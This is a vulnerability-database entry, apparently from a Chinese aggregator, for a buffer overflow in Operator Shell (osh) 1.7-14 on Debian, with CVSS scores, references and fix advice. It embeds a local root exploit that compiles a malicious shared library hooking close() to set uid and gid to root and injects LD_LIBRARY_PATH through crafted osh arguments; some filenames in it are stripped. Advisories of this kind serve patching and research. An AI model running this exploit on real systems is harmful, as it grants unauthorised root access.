发布时间 :2005-11-20 16:03:00
修订时间 :2011-03-07 21:26:23

[原文]Buffer overflow in the environment variable substitution code in main.c in OSH 1.7-14 allows local users to inject arbitrary environment variables, such as LD_PRELOAD, via pathname arguments of the form "$VAR/EVAR=arg", which cause the EVAR portion to be appended to a buffer returned by a getenv function call.

[CNNVD]Mike Neuman OSH环境变量缓冲区溢出漏洞(CNNVD-200511-276)

        OSH 1.7-14的main.c中环境变量替换代码内的缓冲区溢出,可让本地用户通过""$VAR/EVAR=arg"形式(这会导致EVAR部分附加到由getenv函数调用返回的缓冲区中)的路径名参数注入任意环境变量,如LD_PRELOAD。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  VUPEN  ADV-2005-2378
(UNKNOWN)  XF  osh-main-execute-code(23091)
(UNKNOWN)  BID  15370

- 漏洞信息

Mike Neuman OSH环境变量缓冲区溢出漏洞
高危 缓冲区溢出
2005-11-20 00:00:00 2005-11-21 00:00:00
        OSH 1.7-14的main.c中环境变量替换代码内的缓冲区溢出,可让本地用户通过""$VAR/EVAR=arg"形式(这会导致EVAR部分附加到由getenv函数调用返回的缓冲区中)的路径名参数注入任意环境变量,如LD_PRELOAD。

- 公告与补丁


- 漏洞信息 (1300)

Operator Shell (osh) 1.7-14 Local Root Exploit (EDBID:1300)
linux local
2005-11-09 Verified
0 Charles Stevenson
N/A [点击下载]
# OSH 1.7-14 Exploit
# EDUCATIONAL purposes only.... :-)
# by Charles Stevenson (core) <>
# Description:
# The Operator Shell (Osh) is a setuid root, security enhanced, restricted
# shell. It allows the administrator to carefully limit the access of special
# commands and files to the users whose duties require their use, while
# at the same time automatically maintaining audit records. The configuration
# file for Osh contains an administrator defined access profile for each
# authorized user or group.
# Problem discovered and described by Solar Eclipse:
#  main.c:439
#      if (gettoken(env, MAXENV)!=TWORD) {
#        fprintf(stderr,"Illegal or too long environment variable\n");
#        break;
#      }
#      if ((env2=getenv(env))==NULL) {
#        char temp[255];
#        char *temp2;
#        strcpy(temp,env);
#        if ((temp2=(char *)strrchr(temp,'/'))!=NULL) {
#          if (temp2!=temp)
#            *temp2='\0';
#          else
#            *(temp2+1)='\0';
#          if ((env2=getenv(temp))!=NULL) {
#            strcat(env2,"/");
#            strcat(env2,temp2+1);
#          }
#        }
#      }
#  exploit:
#      This code is used to handle substitutions of environmental
#      variables. If the first call to getenv() fails, we might have a case
#      like $VAR/filename, so we find the last '/' character and replace
#      it with '\0'. Then we call getenv() on the shortened variable and
#      append "/filename" to it. The problem is that the return value of
#      getenv() is a NULL terminated string on the stack and by appending
#      to it we will overwriting the data after the string.
#      This bug allows us to overwrite one of the environmental variables
#      passed to the child process. If we set the environmental variable
#      $VAR to the string "a" before executing osh, and then pass
#      "$VAR/" as a command line parameter, the above
#      code will overwrite the value of some environmental variable located
#      after $VAR with Then osh will execute an
#      external non-suid program and the code in will be executed.
#      I have not tested this, but it looks like a really cool bug.
# Risk: Medium since user would have to be in the operator group which
#       the admin would have to grant explicitly and I assume would be
#       a trustworthy individual ;-)
#       Then again the last two have been classified as "urgency=high"
#       according to Debian policy.  Truly sorry to cause Oohara Yuuma
#       so much work.  You really should orphan this package ;)
# Solution:
# apt-get --purge remove osh
# greetz to solar eclipse, nemo, andrewg, arcanum, mercy, amnesia, 
# banned-it, capsyl, sloth, ben, KF, akt0r, MRX, salvia, thn
# (#social)
# 0dd: much <3 & respect
# Obligatory screenshot:
#   core@charity:~/hacking/sploits$ dpkg -l osh|grep ^ii
#   ii  osh            1.7-14         Operator's Shell
#   core@charity:~/hacking/sploits$ ./ 
#   telnet: could not resolve /home/core/ Name or service not known
#   sh-3.00# id
#   uid=0(root) gid=0(root) groups=0(root)

cd /tmp; cat >ownall.c <<EOF
/* ownall.c by Charles Stevenson (core) <>
 * greetz Solar Eclipse, 0dd, (#social) */
#include <stdlib.h>
#include <unistd.h>
int close(int fd) {
  gid_t groupsex = 0; /* osh isn't gettin' any tonight */
  setuid(0); /* Not really needed but make uid root */
  setgid(0); /* Set gid root too! */
  setgroups((size_t)1,&groupsex); /* This makes my pastes cooler looking */
  clearenv(); /* LD_PRELOAD was causing headaches ;) */
  return 0;
gcc -shared -o ownall.c
osh telnet -l '$USER/LD_LIBRARY_PATH=.' '$HOME/'
rm -f ownall*

# [2005-11-09]

- 漏洞信息

Operator Shell (osh) main.c Environment Variable Substitution Local Privilege Escalation
Local Access Required Other
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

Operator Shell (osh) contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered by an error in the handling of environment variable substitutions, and exploited by loading arbitrary shared libraries. This flaw may lead to a loss of Integrity.

- 时间线

2005-11-09 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.15 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Mike Neuman OSH Environment Variable Buffer Overflow Vulnerability
Boundary Condition Error 15370
No Yes
2005-11-09 12:00:00 2006-04-26 08:46:00
The discovery of this issue is credited to Solar Eclipse.

- 受影响的程序版本

osh osh 1.7
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Debian Linux 3.1 sparc
Debian Linux 3.1 s/390
Debian Linux 3.1 ppc
Debian Linux 3.1 mipsel
Debian Linux 3.1 mips
Debian Linux 3.1 m68k
Debian Linux 3.1 ia-64
Debian Linux 3.1 ia-32
Debian Linux 3.1 hppa
Debian Linux 3.1 arm
Debian Linux 3.1 amd64
Debian Linux 3.1 alpha
Debian Linux 3.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0

- 漏洞讨论

The 'osh' utility is susceptible to a buffer-overflow vulnerability when processing environment variables. This issue is due to a flaw in the application that results in overwriting adjacent environment variables with user-supplied contents.

Attackers may exploit this issue to execute arbitrary code with superuser privileges.

- 漏洞利用

An exploit is not required.

The following example exploit by Charles Stevenson (core) <> is available:

- 解决方案

Debian GNU/Linux has released advisory DSA 918-1, along with fixes to address various issues in osh. Please see the referenced advisory for further information.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at:

osh osh 1.7

- 相关参考